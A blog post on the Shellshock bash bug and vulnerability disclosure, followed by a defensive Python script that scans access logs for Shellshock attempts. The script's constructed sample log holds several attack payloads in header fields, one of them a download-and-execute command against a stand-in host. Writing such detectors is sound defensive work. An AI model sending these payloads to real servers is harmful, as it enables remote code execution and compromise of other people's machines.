Bug bounties, vulnerability disclosure, and Shellshock


My colleague Professor Kristen Eichensehr has a very interesting post at Just Security about the newly disclosed Shellshock vulnerability, bug bounties, the vulnerability disclosure system, and the complex interaction between the U.S. government and private ordering when it comes to computer security. The opening paragraph:

Last week news broke of a major software bug—now termed "Shellshock"—in open-source software used in Linux and UNIX operating systems. Security experts have warned that the vulnerability is particularly troubling because it allows attackers to take control of machines running the software and because there may be half a billion such devices. Soon after the disclosure of the bug and patches aimed to protect against it, the blowback started: security firms began to report seeing attempts to exploit the vulnerability (see here and here).
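Added here as an illustration, not part of Professor Eichensehr's post or of the original of this one: the exploit attempts she mentions were, in the common case, ordinary HTTP requests carrying a Shellshock payload in a request header. CGI web servers hand request headers to scripts as environment variables (User-Agent becomes HTTP_USER_AGENT, Referer becomes HTTP_REFERER), and bash before the fix treated any variable whose value began with `() {` as a function definition and went on to execute whatever followed the function body. The script below scans web server access logs in the common "combined" format for that signature and pulls out the commands an attacker was trying to run. The log lines are constructed for this example using documentation IP ranges; they are not observed traffic, and the field names and functions are this example's own.

```python
import re
from collections import Counter
from typing import Iterator, NamedTuple, Optional

# Constructed sample of Apache/nginx "combined" access-log lines for this example.
# The addresses are RFC 5737 documentation ranges; none of this is observed traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.9/x -O /tmp/x; chmod +x /tmp/x; /tmp/x'"
198.51.100.23 - - [26/Sep/2014:10:12:05 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/32.0"
203.0.113.7 - - [26/Sep/2014:10:12:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { ignored;}; echo Content-Type: text/plain; echo; /usr/bin/id" "curl/7.38.0"
192.0.2.44 - - [26/Sep/2014:10:13:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "() { test;};/usr/bin/python -c 'import socket'"
192.0.2.45 - - [26/Sep/2014:10:13:02 +0000] "GET /about HTTP/1.1" 200 2210 "-" "Shellshock-scanner (educational) { :; }"
"""

# One "combined" log line. Quoted fields may contain \" escapes, so they are
# matched as runs of non-quote characters or backslash-escaped characters.
_QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>' + _QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + _QUOTED + r')" "(?P<ua>' + _QUOTED + r')"$'
)

# Pre-fix bash treated an environment variable whose value began with the four
# bytes "() {" as a function definition and went on executing whatever followed
# the function body's closing brace. The pattern tolerates extra whitespace so
# malformed or obfuscated attempts are flagged as well.
SHELLSHOCK_RE = re.compile(r'^\s*\(\)\s*\{')


class Hit(NamedTuple):
    ip: str
    timestamp: str
    path: str
    header: str       # which request header carried the payload
    payload: str      # the commands that would run after the function body
    cgi_target: bool  # classic vector: a request for something under /cgi-bin/


def parse_line(line: str) -> Optional[dict]:
    """Split one combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    parts = fields["req"].split()
    fields["path"] = parts[1] if len(parts) >= 2 else fields["req"]
    return fields


def extract_payload(value: str) -> str:
    """Return the command tail after the fake function body,
    e.g. '() { :;}; /usr/bin/id' -> '/usr/bin/id'. Empty if the body is truncated."""
    _, _, tail = value.partition("}")
    return tail.lstrip(" ;")


def iter_shellshock_attempts(log_text: str) -> Iterator[Hit]:
    for line in log_text.splitlines():
        fields = parse_line(line)
        if fields is None:
            continue
        # CGI servers export these two headers as HTTP_REFERER / HTTP_USER_AGENT.
        # Other headers (Cookie, Host, ...) were usable too but are not in this log format.
        for header, value in (("Referer", fields["referer"]), ("User-Agent", fields["ua"])):
            if SHELLSHOCK_RE.match(value):
                yield Hit(
                    ip=fields["ip"],
                    timestamp=fields["ts"],
                    path=fields["path"],
                    header=header,
                    payload=extract_payload(value),
                    cgi_target=fields["path"].startswith("/cgi-bin/"),
                )


def find_shellshock_attempts(log_text: str) -> list:
    return list(iter_shellshock_attempts(log_text))


def attempts_per_source(hits) -> dict:
    """Count attempts by source address, most active first."""
    return dict(Counter(h.ip for h in hits).most_common())


if __name__ == "__main__":
    hits = find_shellshock_attempts(SAMPLE_LOG)
    for h in hits:
        vector = "cgi-bin" if h.cgi_target else "non-CGI path"
        print(f"{h.timestamp} {h.ip} {h.header} -> {h.path} ({vector}): {h.payload}")
    print(attempts_per_source(hits))
```

Two caveats a practitioner would add: the combined log format only records the Referer and User-Agent headers, so payloads sent in Cookie, Host or custom headers are invisible to this scan unless the server logs them; and a match against a path outside `/cgi-bin/`, like the `/login` request above, is still worth noting, since scanners sprayed the payload at every URL rather than only at known CGI endpoints.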